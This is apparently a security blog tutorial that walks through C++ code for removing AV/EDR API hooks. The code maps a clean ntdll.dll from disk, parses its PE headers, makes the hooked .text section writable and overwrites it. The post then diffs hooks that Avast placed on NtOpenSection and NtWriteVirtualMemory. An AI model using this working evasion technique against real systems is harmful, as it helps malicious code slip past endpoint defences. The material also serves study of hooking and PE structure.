PE Parsing and Defeating AV/EDR API Hooks in C++

Introduction

This post is a look at defeating AV/EDR-created API hooks, using code originally written by @spotless located here. I want to make clear that spotless did the legwork on this; I simply made some small functional changes and added a lot of comments and documentation. This was mainly an exercise in improving my understanding of the topic, as I find that going through code function by function with the MSDN documentation handy is a good way to get a handle on how it works. It can be a little tedious, which is why I’ve documented the code rather excessively, so that others can hopefully learn from it without having to go to the same trouble.

Many thanks to spotless!

This post touches on several topics, such as system calls, user mode vs. kernel mode, and Windows architecture, that I have covered somewhat here. I’m going to assume a certain amount of familiarity with them.

The code for this post is available here.

Understanding API Hooks

What is hooking exactly? It’s a technique commonly used by AV/EDR products to intercept a function call and redirect the flow of execution to the AV/EDR so it can inspect the call and determine whether it is malicious. This is a powerful technique, as the defensive application can see each and every function call you make, decide if it is malicious, and block it, all in one step. Even worse (for attackers, that is), these products hook native functions in system libraries/DLLs, which sit beneath the traditionally used Win32 APIs. For example, WriteProcessMemory, a commonly used Win32 API for writing shellcode into a process address space, actually calls the undocumented native function NtWriteVirtualMemory, contained in ntdll.dll. NtWriteVirtualMemory in turn is just a wrapper for a system call into kernel mode. Since AV/EDR products are able to hook function calls at the lowest level accessible to user-mode code, there’s no escaping them. Or is there?

Where Hooks Happen

To understand how we can defeat hooks, we need to know how and where they are created. When a process is started, certain libraries or DLLs are loaded into the process address space as modules. Each application is different and will load different libraries, but virtually all of them will use ntdll.dll no matter their functionality, as many of the most common Windows functions reside in it. Defensive products take advantage of this fact by hooking functions within the DLL. By hooking, we mean actually modifying the assembly instructions of a function, inserting an unconditional jump into the EDR’s code at the very beginning of the function. The EDR inspects the call, and if it is allowed, execution jumps back to the original function so that it performs as it normally would, with the calling process none the wiser.
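To make that concrete, here is a minimal sketch of what such a patch looks like at the byte level. It assumes the hook is a near jump (opcode 0xE9 followed by a signed 32-bit displacement), which is the pattern that shows up in the disassembly later in this post; other products may well use different instruction sequences. The decodeJump helper and its parameters are hypothetical names for illustration and are not part of spotless’s code:

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Hypothetical helper: if the bytes at `code` begin with a near jump
// (0xE9 + signed 32-bit displacement), store the jump destination in
// `target` and return true. `address` is where `code` sits in memory.
bool decodeJump(const std::uint8_t* code, std::size_t length,
                std::uint64_t address, std::uint64_t& target)
{
    assert(code != nullptr);
    if (length < 5 || code[0] != 0xE9)
        return false; // not a jmp rel32, so not hooked in this particular way

    // Assemble the little-endian displacement byte by byte.
    const std::uint32_t raw = static_cast<std::uint32_t>(code[1])
                            | (static_cast<std::uint32_t>(code[2]) << 8)
                            | (static_cast<std::uint32_t>(code[3]) << 16)
                            | (static_cast<std::uint32_t>(code[4]) << 24);
    const std::int32_t displacement = static_cast<std::int32_t>(raw);

    // The displacement is relative to the instruction after the 5-byte jmp.
    target = address + 5 + static_cast<std::int64_t>(displacement);
    return true;
}
```

Pointing this at the first bytes of an exported function gives a quick, if crude, hint as to whether something has redirected it.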

Identifying the Hooks

So we know that within our process, the ntdll.dll module has been modified and we can’t trust any function calls that use it. How can we undo these hooks? We could identify the exact version of Windows we are on, find out what the actual assembly instructions should be, and try to patch them on the fly. But that would be tedious, error-prone, and not reusable. It turns out there is a pristine, unmodified, unhooked version of ntdll.dll already sitting on disk!

So the strategy looks like this. First we’ll map a copy of ntdll.dll into our process memory, in order to have a clean version to work with. Then we will identify the location of the hooked version within our process. Finally we simply overwrite the hooked code with the clean code and we’re home free!

Simple right?

Mapping ntdll.dll

Sarcasm aside, mapping a view of the ntdll.dll file is actually quite straightforward. We get a handle to ntdll.dll, get a handle to a file mapping of it, and map it into our process:

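// open the on-disk copy of ntdll.dll for reading
HANDLE hNtdllFile = CreateFileA("c:\\windows\\system32\\ntdll.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
// SEC_IMAGE maps the file as a loaded image; a maximum size of 0, 0 means the current size of the file
HANDLE hNtdllFileMapping = CreateFileMapping(hNtdllFile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
// map the whole image into our address space
LPVOID ntdllMappingAddress = MapViewOfFile(hNtdllFileMapping, FILE_MAP_READ, 0, 0, 0);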

Pretty simple. Now that we have a view of the clean DLL mapped into our address space, let’s find the hooked copy.

To find the location of the hooked ntdll.dll within our process memory, we need to locate it within the list of modules loaded in our process. Modules in this case are DLLs and the primary executable of our process, and there is a list of them stored in the Process Environment Block. A great summary of the PEB is here. To access this list, we get a handle to our process and to the module we want, and then call GetModuleInformation. We can then retrieve the base address of the DLL from our miModuleInfo struct:

HANDLE hCurrentProcess = GetCurrentProcess();
HMODULE hNtdllModule = GetModuleHandleA("ntdll.dll");
MODULEINFO miModuleInfo = {};
GetModuleInformation(hCurrentProcess, hNtdllModule, &miModuleInfo, sizeof(miModuleInfo));
LPVOID pHookedNtdllBaseAddress = (LPVOID)miModuleInfo.lpBaseOfDll;

The Dreaded PE Header

Ok, so we have the base address of the loaded ntdll.dll module within our process. But what does that mean exactly? Well, a DLL is a type of Portable Executable, along with EXEs. This means it is an executable file, and as such it contains a variety of headers and sections of different types that let the operating system know how to load and execute it. The PE header is notoriously dense and complex, as the link above shows, but I’ve found that seeing a working example in action that utilizes only parts of it makes it much easier to comprehend. Oh and pictures don’t hurt either. There are many out there with varying levels of detail, but here is a good one from Wikipedia that has enough detail without being too overwhelming:

PE Header

You can see the legacy of Windows is present at the very beginning of the PE, in the DOS header. It’s always there, but in modern times it doesn’t serve much purpose. We will still read it, however, because it tells us where the actual PE header begins:

PIMAGE_DOS_HEADER hookedDosHeader = (PIMAGE_DOS_HEADER)pHookedNtdllBaseAddress;
PIMAGE_NT_HEADERS hookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)pHookedNtdllBaseAddress + hookedDosHeader->e_lfanew);

Here the e_lfanew field of the hookedDosHeader struct contains an offset from the module base to where the PE header actually begins: the PE signature, immediately followed by the COFF header in the diagram above.
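If you want to see the same lookup without the Windows typedefs in the way, here is a small sketch that does it on a plain byte buffer. It relies on two facts from the PE format: e_lfanew lives at offset 0x3C of the DOS header, and the PE header starts with the four bytes "PE\0\0". The function names readU32 and findPeHeaderOffset are made up for this example:

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Read a little-endian 32-bit value from a byte buffer.
static std::uint32_t readU32(const std::vector<std::uint8_t>& image, std::size_t offset)
{
    assert(offset + 4 <= image.size());
    return static_cast<std::uint32_t>(image[offset])
         | (static_cast<std::uint32_t>(image[offset + 1]) << 8)
         | (static_cast<std::uint32_t>(image[offset + 2]) << 16)
         | (static_cast<std::uint32_t>(image[offset + 3]) << 24);
}

// Hypothetical helper: return the offset of the "PE\0\0" signature,
// or 0 if the buffer does not look like a PE image.
std::size_t findPeHeaderOffset(const std::vector<std::uint8_t>& image)
{
    const std::size_t kLfanewOffset = 0x3C; // position of e_lfanew in the DOS header
    if (image.size() < kLfanewOffset + 4)
        return 0;
    if (image[0] != 'M' || image[1] != 'Z') // e_magic, the DOS signature
        return 0;

    const std::size_t peOffset = readU32(image, kLfanewOffset);
    if (peOffset + 4 > image.size())
        return 0;
    if (readU32(image, peOffset) != 0x00004550) // "PE\0\0" read as little-endian
        return 0;
    return peOffset;
}
```

The real code gets away without these checks because ntdll.dll was already loaded by Windows, but they are worth having if you ever parse a file you don’t trust.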

Now that we are at the beginning of the PE header, we can begin parsing it to find what we’re looking for. But let’s step back for a second and identify exactly what we are looking for so we know when we’ve found it.

Every executable/PE has a number of sections. These sections represent various types of data and code within the program, such as actual executable code, resources, images, icons, etc. These types of data are split into different labeled sections within the executable, named things like .text, .data, .rdata and .rsrc. The .text section, sometimes called the .code section, is what we are after, as it contains the assembly language instructions that make up ntdll.dll.

So how do we access these sections? In the diagram above, we see there is a section table, which is an array of section headers, one per section, each describing where its section lives. Perfect for iterating through. This is how we will find our .text section, with a for loop bounded by the hookedNtHeader->FileHeader.NumberOfSections field:

for (WORD i = 0; i < hookedNtHeader->FileHeader.NumberOfSections; i++)
{
    // loop through each section offset
}

From here on out, don’t forget we will be inside this loop, looking for the .text section. To identify it, we use our loop counter i as an index into the section table itself, and get a pointer to the section header:

PIMAGE_SECTION_HEADER hookedSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(hookedNtHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));

The section header for each section contains the name of that section. So we can look at each one and see if it matches .text:

if (!strcmp((char*)hookedSectionHeader->Name, (char*)".text"))
{
    // process the header
}

We found the .text section! The header for it anyway. What we need now is to know the size and location of the actual code within the section. The section header has us covered for both:

LPVOID hookedVirtualAddressStart = (LPVOID)((DWORD_PTR)pHookedNtdllBaseAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress);
SIZE_T hookedVirtualAddressSize = hookedSectionHeader->Misc.VirtualSize;

We now have everything we need to overwrite the .text section of the loaded and hooked ntdll.dll module with our clean ntdll.dll on disk:

  • The source to copy from (our memory-mapped view of ntdll.dll from disk)
  • The destination to copy to (hookedVirtualAddressStart, the module base plus hookedSectionHeader->VirtualAddress)
  • The number of bytes to copy (hookedVirtualAddressSize, taken from hookedSectionHeader->Misc.VirtualSize)
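The section walk above can also be tried out away from a live process. The sketch below uses a cut-down stand-in for IMAGE_SECTION_HEADER that keeps only the three fields this post reads; SectionInfo, findSection and sectionStart are names invented for the example. One small difference from the code above: it compares at most 8 bytes, since a section name that uses all 8 bytes has no terminating null.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

// Simplified stand-in for IMAGE_SECTION_HEADER: only the fields used in this post.
struct SectionInfo
{
    char          name[8];        // not null-terminated when all 8 bytes are used
    std::uint32_t virtualSize;    // Misc.VirtualSize
    std::uint32_t virtualAddress; // offset of the section from the module base
};

// Hypothetical helper: return the first section whose name matches, or nullptr.
const SectionInfo* findSection(const SectionInfo* table, std::size_t count, const char* wanted)
{
    assert(table != nullptr && wanted != nullptr);
    for (std::size_t i = 0; i < count; ++i)
    {
        // Compare at most 8 bytes so an unterminated name cannot be overrun.
        if (std::strncmp(table[i].name, wanted, sizeof(table[i].name)) == 0)
            return &table[i];
    }
    return nullptr;
}

// The copy destination is the module base plus the section's VirtualAddress.
std::uint64_t sectionStart(std::uint64_t moduleBase, const SectionInfo& section)
{
    return moduleBase + section.virtualAddress;
}
```

With a table containing .rdata, .textbss and .text, looking up ".text" returns the third entry rather than stopping at .textbss, because the comparison only succeeds when the whole name matches.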

Saving the Output

At this point, we save the entire contents of the hooked .text section so we can later compare it to the clean version and see exactly what the unhooking changed:

char* hookedBytes{ new char[hookedVirtualAddressSize] {} };
memcpy_s(hookedBytes, hookedVirtualAddressSize, hookedVirtualAddressStart, hookedVirtualAddressSize);
saveBytes(hookedBytes, "hooked.txt", hookedVirtualAddressSize);

This simply makes a copy of the hooked .text section and calls the saveBytes function, which writes the bytes to a text file named hooked.txt. We’ll examine this file a little later on.
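The saveBytes function itself lives in the linked repository and isn’t reproduced in this post. As a rough idea of what a helper like that could look like, here is a sketch under the assumption that it writes the raw bytes to disk unchanged. The name saveBytesSketch and its return value are mine, so don’t take this as the actual implementation:

```cpp
#include <cassert>
#include <cstddef>
#include <fstream>
#include <string>

// Hypothetical stand-in for the post's saveBytes helper.
// Writes `size` raw bytes to `path` and reports whether the write succeeded.
bool saveBytesSketch(const char* bytes, const std::string& path, std::size_t size)
{
    assert(bytes != nullptr);
    // Binary mode stops the runtime from translating 0x0A bytes on Windows,
    // which would otherwise corrupt a dump of machine code.
    std::ofstream out(path.c_str(), std::ios::binary | std::ios::trunc);
    if (!out)
        return false;
    out.write(bytes, static_cast<std::streamsize>(size));
    return out.good();
}
```

Whatever the real helper does, binary mode is the detail that matters if you write your own, since the dump is full of bytes that look like line endings.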

Memory Management

In order to overwrite the contents of the .text section, we need to save the current memory protection and change it to Read/Write/Execute. We’ll change it back once we’re done:

DWORD oldProtection = 0;
bool isProtected;
// make the .text section writable, saving the previous protection in oldProtection
isProtected = VirtualProtect(hookedVirtualAddressStart, hookedVirtualAddressSize, PAGE_EXECUTE_READWRITE, &oldProtection);
// overwrite the .text section here
// restore the original protection
isProtected = VirtualProtect(hookedVirtualAddressStart, hookedVirtualAddressSize, oldProtection, &oldProtection);

Home Stretch

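We’re finally at the last phase. We start by computing the address of the .text section within the memory-mapped ntdll.dll to use as our copy source. Because the file was mapped with SEC_IMAGE, it is laid out like a loaded image, so the same VirtualAddress offset applies: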

LPVOID cleanVirtualAddressStart = (LPVOID)((DWORD_PTR)ntdllMappingAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress);

Let’s save these bytes as well, so we can compare them later:

char* cleanBytes{ new char[hookedVirtualAddressSize] {} };
memcpy_s(cleanBytes, hookedVirtualAddressSize, cleanVirtualAddressStart, hookedVirtualAddressSize);
saveBytes(cleanBytes, "clean.txt", hookedVirtualAddressSize);

Now we can overwrite the .text section with the unhooked copy of ntdll.dll:

memcpy_s(hookedVirtualAddressStart, hookedVirtualAddressSize, cleanVirtualAddressStart, hookedVirtualAddressSize);
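The copy itself is simple enough that it is easy to forget the assumptions behind it: the same offset and size must be valid in both images. Here is a sketch of the same step on two ordinary buffers with those assumptions checked explicitly. The vectors stand in for the hooked module and the clean mapping, and restoreSection is a hypothetical name:

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Hypothetical helper: copy one section from a clean image over the same
// range of a hooked image. `rva` and `size` come from the section header.
bool restoreSection(std::vector<std::uint8_t>& hooked,
                    const std::vector<std::uint8_t>& clean,
                    std::size_t rva, std::size_t size)
{
    // Refuse to copy if the range would run past the end of either image.
    if (rva > hooked.size() || size > hooked.size() - rva)
        return false;
    if (rva > clean.size() || size > clean.size() - rva)
        return false;
    if (size == 0)
        return true;

    std::memcpy(hooked.data() + rva, clean.data() + rva, size);

    // Sanity check: the restored range now matches the clean image.
    assert(std::memcmp(hooked.data() + rva, clean.data() + rva, size) == 0);
    return true;
}
```

In the real process the destination is executable memory, so this only works between the two VirtualProtect calls shown earlier.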

That’s it! All this work for one measly line…

Checking Our Work

So how do we know we actually removed hooks and didn’t just move a bunch of bytes around? Let’s check our output files, hooked.txt and clean.txt. Here we compare them using VBinDiff. This first example is from running the program on a test machine with no AV/EDR product installed, and as expected, the loaded ntdll and the one on disk are identical:

No AV

So let’s run it again, this time on a machine with Avast Free Antivirus running, which uses hooks:

Running

With AV 1

Here we see hooked.txt on top and clean.txt on the bottom, and there are clear differences highlighted in red. We can take these raw bytes, which actually represent assembly instructions, and convert them to their assembly representation with an online disassembler.
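If you would rather not eyeball a binary diff, the same comparison can be done in a few lines of code. This sketch takes the two dumps as byte vectors and reports each run of differing bytes as a [start, end) pair of offsets. The diffRanges name is hypothetical, and the sketch assumes both dumps are the same length, which holds here because both were saved with hookedVirtualAddressSize:

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <utility>
#include <vector>

// Hypothetical helper: return the [start, end) offsets of each run of
// consecutive bytes that differ between the two dumps.
std::vector<std::pair<std::size_t, std::size_t> > diffRanges(
    const std::vector<std::uint8_t>& hooked,
    const std::vector<std::uint8_t>& clean)
{
    assert(hooked.size() == clean.size()); // both dumps cover the same .text section
    std::vector<std::pair<std::size_t, std::size_t> > ranges;
    std::size_t i = 0;
    while (i < hooked.size())
    {
        if (hooked[i] == clean[i])
        {
            ++i;
            continue;
        }
        const std::size_t start = i;
        while (i < hooked.size() && hooked[i] != clean[i])
            ++i;
        ranges.push_back(std::make_pair(start, i));
    }
    return ranges;
}
```

Keep in mind that a single hook can show up as more than one range, since a patched byte may happen to equal the original byte in the middle of the patch.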

Here is the disassembly of the clean ntdll.dll:

mov    QWORD PTR [rsp+0x20],r9
mov    QWORD PTR [rsp+0x10],rdx 

And here is the hooked version:

jmp    0xffffffffc005b978
int3
int3
int3
int3
int3 

A clear jump! This means that something has definitely changed in ntdll.dll when it is loaded into our process.

But how do we know it’s actually hooking a function call? Let’s see if we can find out a little more. Here is another example diff between the hooked DLL on top and the clean one on the bottom:

With AV 1

First the clean DLL:

mov    r10,rcx
mov    eax,0x37 
mov    r10,rcx
mov    eax,0x3a

And the hooked DLL:

jmp    0xffffffffbffe5318
int3
int3
int3
jmp    0xffffffffbffe4cb8
int3
int3
int3 

Ok, so we see some more jumps. But what do the numbers in those mov eax instructions mean? Those are syscall numbers! In my previous post, I went over how and why to find exactly these in assembly. The idea is to use the syscall number to directly invoke the underlying function in order to avoid… hooks! But what if you want to run code you haven’t written? How do you prevent those hooks from catching that code you can’t change? If you’ve made it this far, you already know!

So let’s use Mateusz “j00ru” Jurczyk’s handy Windows system call table and match up the syscall numbers with their corresponding function calls.

What do we find? 0x37 is NtOpenSection, and 0x3a is NtWriteVirtualMemory! Avast was clearly hooking these function calls. And we know that we have overwritten them with our clean DLL. Success!
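The pattern in the clean disassembly is regular enough to read mechanically. On x64, mov r10, rcx encodes as the bytes 4C 8B D1, and mov eax, imm32 encodes as B8 followed by the 32-bit number. The sketch below pulls the syscall number out of a stub that starts that way; readSyscallNumber is a hypothetical name, and the sketch assumes the stub has exactly this shape, which is not guaranteed for every function or Windows version:

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Hypothetical helper: read the syscall number from an unhooked x64 stub
// that begins with `mov r10, rcx` followed by `mov eax, imm32`.
bool readSyscallNumber(const std::uint8_t* stub, std::size_t length, std::uint32_t& number)
{
    assert(stub != nullptr);
    if (length < 8)
        return false;
    if (stub[0] != 0x4C || stub[1] != 0x8B || stub[2] != 0xD1) // mov r10, rcx
        return false;
    if (stub[3] != 0xB8)                                       // mov eax, imm32
        return false;

    // The immediate is stored little-endian right after the opcode.
    number = static_cast<std::uint32_t>(stub[4])
           | (static_cast<std::uint32_t>(stub[5]) << 8)
           | (static_cast<std::uint32_t>(stub[6]) << 16)
           | (static_cast<std::uint32_t>(stub[7]) << 24);
    return true;
}
```

Fed the clean bytes for the two stubs above, it yields 0x37 and 0x3a. Fed the hooked bytes, it fails on the very first check, because the stub now starts with the jump instead.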

Conclusion

Thanks again to spotless and his code that made this post possible. I hope it has been helpful and that the comments and documentation I’ve added help others learn more easily about hooking and the PE header.

- Solomon Sklash